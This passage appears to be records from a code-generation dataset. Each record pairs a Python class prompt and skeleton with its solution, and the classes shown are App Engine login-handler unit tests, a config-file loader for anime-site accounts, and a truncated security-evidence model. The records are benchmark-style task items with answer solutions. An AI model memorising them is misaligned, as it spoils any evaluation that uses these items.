'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. 
In the case of status, it will just return the integer statu\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = ''\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n<|end_body_0|>\n\n<|body_start_1|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = 'Login'\n set_email = EMAIL\n set_admin = False\n continue_url = ''\n expected_set = login._set_user_info_cookie(set_email, set_admin).strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_1|>\n\n<|body_start_2|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = 'Logout'\n set_email = ''\n set_admin = False\n continue_url = ''\n expected_set = login._clear_user_info_cookie().strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_2|>\n\n<|body_start_3|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = '/my/fancy/url'\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n self.assertIsInstance(content_type, str)\n<|end_body_3|>\n\n<|body_start_4|>\n environ = {}\n wsgiref.util.setup_testing_defaults(environ)\n environ['SERVER_NAME'] = 'do_not_use'\n environ['SERVER_PORT'] = '666'\n environ['SERVER_PROTOCOL'] = 'HTTP/1.1'\n environ['HTTP_HOST'] = host\n environ['PATH_INFO'] = path_info\n environ['REQUEST_METHOD'] = method\n if cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n 
environ['HTTP_COOKIE'] = cookie_value\n query_dict = {}\n if action:\n query_dict['action'] = action\n if set_email:\n query_dict['email'] = set_email\n if set_admin:\n query_dict['admin'] = set_admin\n if continue_url:\n query_dict['continue'] = continue_url\n if query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\n response_dict = {}\n\n def start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = dict(((k.lower(), v) for k, v in headers))\n login.application(environ, start_response)\n return (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000194", "length_bytes": 12436, "license_type": "permissive", "methods": [{"docstring": "Tests just accessing the login URL with no params.", "name": "test_no_params", "signature": "def test_no_params(self)"}, {"docstring": "Tests when setting the user info with and without continue URL.", "name": "test_login", "signature": "def test_login(self)"}, {"docstring": "Tests when logging out with and without continue URL.", "name": "test_logout", "signature": "def test_logout(self)"}, {"docstring": "Tests when the user is already logged in.", "name": "test_passive", "signature": "def test_passive(self)"}, {"docstring": "Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu", "name": "_run_test", "signature": "def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET')"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_004150", "prompt": "Implement the Python class `LoginPageTest` described below.\n\nClass description:\nTests the various ways of invoking the login page.\n\nMethod signatures and docstrings:\n- def test_no_params(self): Tests just accessing the login URL with no params.\n- def test_login(self): Tests when setting the user info with and without continue URL.\n- def test_logout(self): Tests when logging out with and without continue URL.\n- def test_passive(self): Tests when the user is already logged in.\n- def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'): Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). 
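The _run_test body above is the whole trick of these tests: fabricate a WSGI environ, call the application directly, and keep whatever was handed to start_response. Here is a self-contained Python 3 rendition of the same harness for reference (the recorded body is Python 2 style: urllib.urlencode and the Cookie module); demo_app is a placeholder standing in for login.application.

import wsgiref.util
from http.cookies import SimpleCookie
from urllib.parse import urlencode

def run_wsgi(app, host, path_info, query=None, cookies=None, method='GET'):
    # Fabricate a request environ the same way _run_test does above.
    environ = {}
    wsgiref.util.setup_testing_defaults(environ)
    environ.update({'HTTP_HOST': host, 'PATH_INFO': path_info,
                    'REQUEST_METHOD': method})
    if cookies:
        jar = SimpleCookie(cookies)
        environ['HTTP_COOKIE'] = ';'.join(m.OutputString() for m in jar.values())
    if query:
        environ['QUERY_STRING'] = urlencode(query)

    captured = {}
    def start_response(status, headers):
        # Record the pieces the assertions need instead of writing a body.
        captured['status'] = int(status.split(' ', 1)[0])
        captured['headers'] = {k.lower(): v for k, v in headers}
    app(environ, start_response)
    return captured

# Placeholder app so the harness is runnable on its own.
def demo_app(environ, start_response):
    start_response('302 Found', [('Location', 'http://foo.com/blah')])
    return [b'']

print(run_wsgi(demo_app, 'foo.com:1234', '/_ah/login'))
# -> {'status': 302, 'headers': {'location': 'http://foo.com/blah'}}
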
Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu", "prompted_full_text": "Implement the Python class `LoginPageTest` described below.\n\nClass description:\nTests the various ways of invoking the login page.\n\nMethod signatures and docstrings:\n- def test_no_params(self): Tests just accessing the login URL with no params.\n- def test_login(self): Tests when setting the user info with and without continue URL.\n- def test_logout(self): Tests when logging out with and without continue URL.\n- def test_passive(self): Tests when the user is already logged in.\n- def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'): Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu\n\n<|skeleton|>\nclass LoginPageTest:\n \"\"\"Tests the various ways of invoking the login page.\"\"\"\n\n def test_no_params(self):\n \"\"\"Tests just accessing the login URL with no params.\"\"\"\n <|body_0|>\n\n def test_login(self):\n \"\"\"Tests when setting the user info with and without continue URL.\"\"\"\n <|body_1|>\n\n def test_logout(self):\n \"\"\"Tests when logging out with and without continue URL.\"\"\"\n <|body_2|>\n\n def test_passive(self):\n \"\"\"Tests when the user is already logged in.\"\"\"\n <|body_3|>\n\n def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'):\n \"\"\"Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. 
In the case of status, it will just return the integer statu\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = ''\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n<|end_body_0|>\n\n<|body_start_1|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = 'Login'\n set_email = EMAIL\n set_admin = False\n continue_url = ''\n expected_set = login._set_user_info_cookie(set_email, set_admin).strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_1|>\n\n<|body_start_2|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = 'Logout'\n set_email = ''\n set_admin = False\n continue_url = ''\n expected_set = login._clear_user_info_cookie().strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_2|>\n\n<|body_start_3|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = '/my/fancy/url'\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n self.assertIsInstance(content_type, str)\n<|end_body_3|>\n\n<|body_start_4|>\n environ = {}\n wsgiref.util.setup_testing_defaults(environ)\n environ['SERVER_NAME'] = 'do_not_use'\n environ['SERVER_PORT'] = '666'\n environ['SERVER_PROTOCOL'] = 'HTTP/1.1'\n environ['HTTP_HOST'] = host\n environ['PATH_INFO'] = path_info\n environ['REQUEST_METHOD'] = method\n if cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n 
environ['HTTP_COOKIE'] = cookie_value\n query_dict = {}\n if action:\n query_dict['action'] = action\n if set_email:\n query_dict['email'] = set_email\n if set_admin:\n query_dict['admin'] = set_admin\n if continue_url:\n query_dict['continue'] = continue_url\n if query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\n response_dict = {}\n\n def start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = dict(((k.lower(), v) for k, v in headers))\n login.application(environ, start_response)\n return (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))\n<|end_body_4|>\n", "revision_id": "be17e5f658d7b42b5aa7eeb7a5ddd4962f3ea82f", "skeleton": "<|skeleton|>\nclass LoginPageTest:\n \"\"\"Tests the various ways of invoking the login page.\"\"\"\n\n def test_no_params(self):\n \"\"\"Tests just accessing the login URL with no params.\"\"\"\n <|body_0|>\n\n def test_login(self):\n \"\"\"Tests when setting the user info with and without continue URL.\"\"\"\n <|body_1|>\n\n def test_logout(self):\n \"\"\"Tests when logging out with and without continue URL.\"\"\"\n <|body_2|>\n\n def test_passive(self):\n \"\"\"Tests when the user is already logged in.\"\"\"\n <|body_3|>\n\n def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'):\n \"\"\"Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. 
In the case of status, it will just return the integer statu\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LoginPageTest:\n \"\"\"Tests the various ways of invoking the login page.\"\"\"\n\n def test_no_params(self):\n \"\"\"Tests just accessing the login URL with no params.\"\"\"\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = ''\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n\n def test_login(self):\n \"\"\"Tests when setting the user info with and without continue URL.\"\"\"\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = 'Login'\n set_email = EMAIL\n set_admin = False\n continue_url = ''\n expected_set = login._set_user_info_cookie(set_email, set_admin).strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n\n def test_logout(self):\n \"\"\"Tests when logging out with and without continue URL.\"\"\"\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = 'Logout'\n set_email = ''\n set_admin = False\n continue_url = ''\n expected_set = login._clear_user_info_cookie().strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n\n def test_passive(self):\n \"\"\"Tests when the user is already logged in.\"\"\"\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = '/my/fancy/url'\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n self.assertIsInstance(content_type, str)\n\n def 
_run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'):\n \"\"\"Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu\"\"\"\n environ = {}\n wsgiref.util.setup_testing_defaults(environ)\n environ['SERVER_NAME'] = 'do_not_use'\n environ['SERVER_PORT'] = '666'\n environ['SERVER_PROTOCOL'] = 'HTTP/1.1'\n environ['HTTP_HOST'] = host\n environ['PATH_INFO'] = path_info\n environ['REQUEST_METHOD'] = method\n if cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n environ['HTTP_COOKIE'] = cookie_value\n query_dict = {}\n if action:\n query_dict['action'] = action\n if set_email:\n query_dict['email'] = set_email\n if set_admin:\n query_dict['admin'] = set_admin\n if continue_url:\n query_dict['continue'] = continue_url\n if query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\n response_dict = {}\n\n def start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = dict(((k.lower(), v) for k, v in headers))\n login.application(environ, start_response)\n return (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))\n", "source": "the_stack_v2_python_sparse", "source_path": "AppServer/google/appengine/tools/devappserver2/login_test.py", "source_repo": "obino/appscale", "split": "test", "star_events_count": 1} {"blob_id": "dc0e9a7ab602dee118382eeedce4d7bd1ec8f74b", "bodies": ["_filename = ConfigManager.fallback_file(filename)\nwith open(_filename) as f:\n self._config = json.loads(f.read())", "def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\ndef new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\ntarget = to_symbol(target)\nif target == 'bgm':\n result = new_bgm()\nelif target == 'mal':\n result = new_mal()\nelse:\n result = Hiromi(new_bgm, new_mal)\nreturn result", "file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\nfor a_file in file_list:\n if path.exists(a_file):\n return a_file\nprint('Please give a legal config file, or make a config file at ~/.hiromi or ~/.config/hiromi.json')\nraise ConfigNotFoundException()"], "bodies_text": "<|body_start_0|>\n _filename = ConfigManager.fallback_file(filename)\n with open(_filename) as f:\n self._config = json.loads(f.read())\n<|end_body_0|>\n\n<|body_start_1|>\n def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\n def new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\n target = to_symbol(target)\n if target == 'bgm':\n result = 
new_bgm()\n elif target == 'mal':\n result = new_mal()\n else:\n result = Hiromi(new_bgm, new_mal)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\n for a_file in file_list:\n if path.exists(a_file):\n return a_file\n print('Please give a legal config file, or make a config file at ~/.hiromi or ~/.config/hiromi.json')\n raise ConfigNotFoundException()\n<|end_body_2|>\n", "class_docstring": "Docstring for ConfigManager.", "class_name": "ConfigManager", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ConfigManager:\n \"\"\"Docstring for ConfigManager.\"\"\"\n\n def __init__(self, filename):\n \"\"\"TODO :param filename: TODO\"\"\"\n <|body_0|>\n\n def load_config(self, target):\n \"\"\"Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\"\"\"\n <|body_1|>\n\n def fallback_file(cls, filename):\n \"\"\"Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n _filename = ConfigManager.fallback_file(filename)\n with open(_filename) as f:\n self._config = json.loads(f.read())\n<|end_body_0|>\n\n<|body_start_1|>\n def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\n def new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\n target = to_symbol(target)\n if target == 'bgm':\n result = new_bgm()\n elif target == 'mal':\n result = new_mal()\n else:\n result = Hiromi(new_bgm, new_mal)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\n for a_file in file_list:\n if path.exists(a_file):\n return a_file\n print('Please give a legal config file, or make a config file at ~/.hiromi or ~/.config/hiromi.json')\n raise ConfigNotFoundException()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000195", "length_bytes": 2533, "license_type": "permissive", "methods": [{"docstring": "TODO :param filename: TODO", "name": "__init__", "signature": "def __init__(self, filename)"}, {"docstring": "Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite", "name": "load_config", "signature": "def load_config(self, target)"}, {"docstring": "Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite", "name": "fallback_file", "signature": "def fallback_file(cls, filename)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_val_000382", "prompt": "Implement the Python class `ConfigManager` described below.\n\nClass description:\nDocstring for ConfigManager.\n\nMethod signatures and docstrings:\n- def __init__(self, filename): TODO :param filename: TODO\n- def load_config(self, target): Return the corresponding string representing the websites. 
:param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\n- def fallback_file(cls, filename): Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite", "prompted_full_text": "Implement the Python class `ConfigManager` described below.\n\nClass description:\nDocstring for ConfigManager.\n\nMethod signatures and docstrings:\n- def __init__(self, filename): TODO :param filename: TODO\n- def load_config(self, target): Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\n- def fallback_file(cls, filename): Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\n\n<|skeleton|>\nclass ConfigManager:\n \"\"\"Docstring for ConfigManager.\"\"\"\n\n def __init__(self, filename):\n \"\"\"TODO :param filename: TODO\"\"\"\n <|body_0|>\n\n def load_config(self, target):\n \"\"\"Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\"\"\"\n <|body_1|>\n\n def fallback_file(cls, filename):\n \"\"\"Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n _filename = ConfigManager.fallback_file(filename)\n with open(_filename) as f:\n self._config = json.loads(f.read())\n<|end_body_0|>\n\n<|body_start_1|>\n def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\n def new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\n target = to_symbol(target)\n if target == 'bgm':\n result = new_bgm()\n elif target == 'mal':\n result = new_mal()\n else:\n result = Hiromi(new_bgm, new_mal)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\n for a_file in file_list:\n if path.exists(a_file):\n return a_file\n print('Please give a legal config file, or make a config file at ~/.hiromi or ~/.config/hiromi.json')\n raise ConfigNotFoundException()\n<|end_body_2|>\n", "revision_id": "4cc9552411ed8327fdb48ad6f9af110fe2f8657f", "skeleton": "<|skeleton|>\nclass ConfigManager:\n \"\"\"Docstring for ConfigManager.\"\"\"\n\n def __init__(self, filename):\n \"\"\"TODO :param filename: TODO\"\"\"\n <|body_0|>\n\n def load_config(self, target):\n \"\"\"Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\"\"\"\n <|body_1|>\n\n def fallback_file(cls, filename):\n \"\"\"Return the fallback file for config. 
It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ConfigManager:\n \"\"\"Docstring for ConfigManager.\"\"\"\n\n def __init__(self, filename):\n \"\"\"TODO :param filename: TODO\"\"\"\n _filename = ConfigManager.fallback_file(filename)\n with open(_filename) as f:\n self._config = json.loads(f.read())\n\n def load_config(self, target):\n \"\"\"Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\"\"\"\n def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\n def new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\n target = to_symbol(target)\n if target == 'bgm':\n result = new_bgm()\n elif target == 'mal':\n result = new_mal()\n else:\n result = Hiromi(new_bgm, new_mal)\n return result\n\n def fallback_file(cls, filename):\n \"\"\"Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\"\"\"\n file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\n for a_file in file_list:\n if path.exists(a_file):\n return a_file\n print('Please give a legal config file, or make a config file at ~/.hiromi or ~/.config/hiromi.json')\n raise ConfigNotFoundException()\n", "source": "the_stack_v2_python_sparse", "source_path": "src/hiromi/config.py", "source_repo": "hiecaq/hiromi", "split": "test", "star_events_count": 0} {"blob_id": "52a5d62fcccf5911e5875785fa2a864d72050c5b", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn ProcessEvidence()", "from .alert_evidence import AlertEvidence\nfrom .detection_status import DetectionStatus\nfrom .file_details import FileDetails\nfrom .user_account import UserAccount\nfrom .alert_evidence import AlertEvidence\nfrom .detection_status import DetectionStatus\nfrom .file_details import FileDetails\nfrom .user_account import UserAccount\nfields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be 
